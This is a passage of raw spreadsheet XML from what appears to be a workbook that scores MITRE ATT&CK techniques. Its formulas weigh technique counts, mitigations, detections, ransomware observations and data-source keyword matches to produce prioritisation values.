        <f>IF(AF530="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH530" s="25" t="str" cm="1">
        <f t="array" ref="AH530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI530" s="25">
        <f>IF(AH530="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ530" s="25" t="str" cm="1">
        <f t="array" ref="AJ530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK530" s="25">
        <f>IF(AJ530="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL530" s="25" t="str" cm="1">
        <f t="array" ref="AL530">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC530)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM530" s="25">
        <f>IF(AL530="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN530" s="60">
        <v>1</v>
      </c>
      <c r="AO530" s="51">
        <v>1</v>
      </c>
      <c r="AP530" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ530" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR530" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS530" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT530" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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31" spans="1:47">
      <c r="A531" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B531" s="25">
        <f>SUM(H531,M531,V531)*(1+SUM(AE531,AG531,AI531,AK531,AM531))</f>
        <v>0.05</v>
      </c>
      <c r="C531" s="25" t="s">
        <v>1874</v>
      </c>
      <c r="D531" s="25" t="s">
        <v>1663</v>
      </c>
      <c r="E531" s="25" t="s">
        <v>1875</v>
      </c>
      <c r="F531" s="51">
        <v>0</v>
      </c>
      <c r="G531" s="51">
        <v>1</v>
      </c>
      <c r="H531" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I531">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J531">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K531">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L531">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M531" s="25">
        <v>0</v>
      </c>
      <c r="N531" s="51">
        <v>0</v>
      </c>
      <c r="O531" s="51">
        <v>0</v>
      </c>
      <c r="P531" s="51">
        <v>0</v>
      </c>
      <c r="Q531" s="51">
        <v>0</v>
      </c>
      <c r="R531" s="51"/>
      <c r="S531" s="51">
        <v>0</v>
      </c>
      <c r="T531" s="51"/>
      <c r="U531" s="51">
        <v>0</v>
      </c>
      <c r="V531" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W531">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X531">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y531">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z531">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA531">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB531">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC531" s="29"/>
      <c r="AD531" s="25" t="str" cm="1">
        <f t="array" ref="AD531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE531" s="25">
        <f>IF(AD531="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF531" s="25" t="str" cm="1">
        <f t="array" ref="AF531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG531" s="25">
        <f>IF(AF531="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH531" s="25" t="str" cm="1">
        <f t="array" ref="AH531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI531" s="25">
        <f>IF(AH531="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ531" s="25" t="str" cm="1">
        <f t="array" ref="AJ531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK531" s="25">
        <f>IF(AJ531="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL531" s="25" t="str" cm="1">
        <f t="array" ref="AL531">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC531)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM531" s="25">
        <f>IF(AL531="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN531" s="52">
        <v>1</v>
      </c>
      <c r="AO531" s="51">
        <v>1</v>
      </c>
      <c r="AP531" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ531" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR531" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS531" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT531" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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32" spans="1:47">
      <c r="A532" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B532" s="25">
        <f>SUM(H532,M532,V532)*(1+SUM(AE532,AG532,AI532,AK532,AM532))</f>
        <v>0.05</v>
      </c>
      <c r="C532" s="25" t="s">
        <v>1876</v>
      </c>
      <c r="D532" s="25" t="s">
        <v>1708</v>
      </c>
      <c r="E532" s="25" t="s">
        <v>1877</v>
      </c>
      <c r="F532" s="51">
        <v>0</v>
      </c>
      <c r="G532" s="51">
        <v>1</v>
      </c>
      <c r="H532" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I532">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J532">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K532">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L532">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M532" s="25">
        <v>0</v>
      </c>
      <c r="N532" s="51">
        <v>0</v>
      </c>
      <c r="O532" s="51">
        <v>0</v>
      </c>
      <c r="P532" s="51">
        <v>0</v>
      </c>
      <c r="Q532" s="51">
        <v>0</v>
      </c>
      <c r="R532" s="51"/>
      <c r="S532" s="51">
        <v>0</v>
      </c>
      <c r="T532" s="51"/>
      <c r="U532" s="51">
        <v>0</v>
      </c>
      <c r="V532" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W532">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X532">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y532">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z532">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA532">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB532">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC532" s="29"/>
      <c r="AD532" s="25" t="str" cm="1">
        <f t="array" ref="AD532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE532" s="25">
        <f>IF(AD532="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF532" s="25" t="str" cm="1">
        <f t="array" ref="AF532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG532" s="25">
        <f>IF(AF532="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH532" s="25" t="str" cm="1">
        <f t="array" ref="AH532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI532" s="25">
        <f>IF(AH532="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ532" s="25" t="str" cm="1">
        <f t="array" ref="AJ532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK532" s="25">
        <f>IF(AJ532="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL532" s="25" t="str" cm="1">
        <f t="array" ref="AL532">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC532)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM532" s="25">
        <f>IF(AL532="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN532" s="60">
        <v>1</v>
      </c>
      <c r="AO532" s="51">
        <v>1</v>
      </c>
      <c r="AP532" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ532" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR532" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS532" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT532" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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33" spans="1:47">
      <c r="A533" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B533" s="25">
        <f>SUM(H533,M533,V533)*(1+SUM(AE533,AG533,AI533,AK533,AM533))</f>
        <v>0.05</v>
      </c>
      <c r="C533" s="25" t="s">
        <v>1878</v>
      </c>
      <c r="D533" s="25" t="s">
        <v>1609</v>
      </c>
      <c r="E533" s="25" t="s">
        <v>1879</v>
      </c>
      <c r="F533" s="51">
        <v>0</v>
      </c>
      <c r="G533" s="51">
        <v>1</v>
      </c>
      <c r="H533" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I533">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0</v>
      </c>
      <c r="J533">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="K533">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L533">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M533" s="25">
        <v>0</v>
      </c>
      <c r="N533" s="51">
        <v>0</v>
      </c>
      <c r="O533" s="51">
        <v>0</v>
      </c>
      <c r="P533" s="51">
        <v>0</v>
      </c>
      <c r="Q533" s="51">
        <v>0</v>
      </c>
      <c r="R533" s="51"/>
      <c r="S533" s="51">
        <v>0</v>
      </c>
      <c r="T533" s="51"/>
      <c r="U533" s="51">
        <v>0</v>
      </c>
      <c r="V533" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W533">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X533">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y533">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z533">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA533">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB533">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC533" s="29"/>
      <c r="AD533" s="25" t="str" cm="1">
        <f t="array" ref="AD533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE533" s="25">
        <f>IF(AD533="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF533" s="25" t="str" cm="1">
        <f t="array" ref="AF533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG533" s="25">
        <f>IF(AF533="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH533" s="25" t="str" cm="1">
        <f t="array" ref="AH533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI533" s="25">
        <f>IF(AH533="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ533" s="25" t="str" cm="1">
        <f t="array" ref="AJ533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK533" s="25">
        <f>IF(AJ533="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL533" s="25" t="str" cm="1">
        <f t="array" ref="AL533">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC533)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM533" s="25">
        <f>IF(AL533="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN533" s="52">
        <v>1</v>
      </c>
      <c r="AO533" s="51">
        <v>1</v>
      </c>
      <c r="AP533" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ533" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR533" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS533" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT533" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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34" spans="1:47">
      <c r="A534" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="B534" s="25">
        <f>SUM(H534,M534,V534)*(1+SUM(AE534,AG534,AI534,AK534,AM534))</f>
        <v>0.05</v>
      </c>
      <c r="C534" s="25" t="s">
        <v>1880</v>
      </c>
      <c r="D534" s="25" t="s">
        <v>1881</v>
      </c>
      <c r="E534" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F534" s="51">
        <v>1</v>
      </c>
      <c r="G534" s="51">
        <v>0</v>
      </c>
      <c r="H534" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.05</v>
      </c>
      <c r="I534">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J534">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K534">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L534">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M534" s="25">
        <v>0</v>
      </c>
      <c r="N534" s="51">
        <v>0</v>
      </c>
      <c r="O534" s="51">
        <v>0</v>
      </c>
      <c r="P534" s="51">
        <v>0</v>
      </c>
      <c r="Q534" s="51">
        <v>0</v>
      </c>
      <c r="R534" s="51"/>
      <c r="S534" s="51">
        <v>0</v>
      </c>
      <c r="T534" s="51"/>
      <c r="U534" s="51">
        <v>0</v>
      </c>
      <c r="V534" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0</v>
      </c>
      <c r="W534">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X534">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y534">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z534">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>0</v>
      </c>
      <c r="AA534">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0</v>
      </c>
      <c r="AB534">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AC534" s="29" t="s">
        <v>665</v>
      </c>
      <c r="AD534" s="25" t="str" cm="1">
        <f t="array" ref="AD534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE534" s="25">
        <f>IF(AD534="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF534" s="25" t="str" cm="1">
        <f t="array" ref="AF534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG534" s="25">
        <f>IF(AF534="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH534" s="25" t="str" cm="1">
        <f t="array" ref="AH534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI534" s="25">
        <f>IF(AH534="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ534" s="25" t="str" cm="1">
        <f t="array" ref="AJ534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK534" s="25">
        <f>IF(AJ534="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL534" s="25" t="str" cm="1">
        <f t="array" ref="AL534">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC534)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM534" s="25">
        <f>IF(AL534="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN534" s="60">
        <v>1</v>
      </c>
      <c r="AO534" s="51">
        <v>1</v>
      </c>
      <c r="AP534" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>3.833333333333333E-2</v>
      </c>
      <c r="AQ534" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AR534" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1.6666666666666666E-2</v>
      </c>
      <c r="AS534" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT534" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU53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35" spans="1:47">
      <c r="A535" s="25">
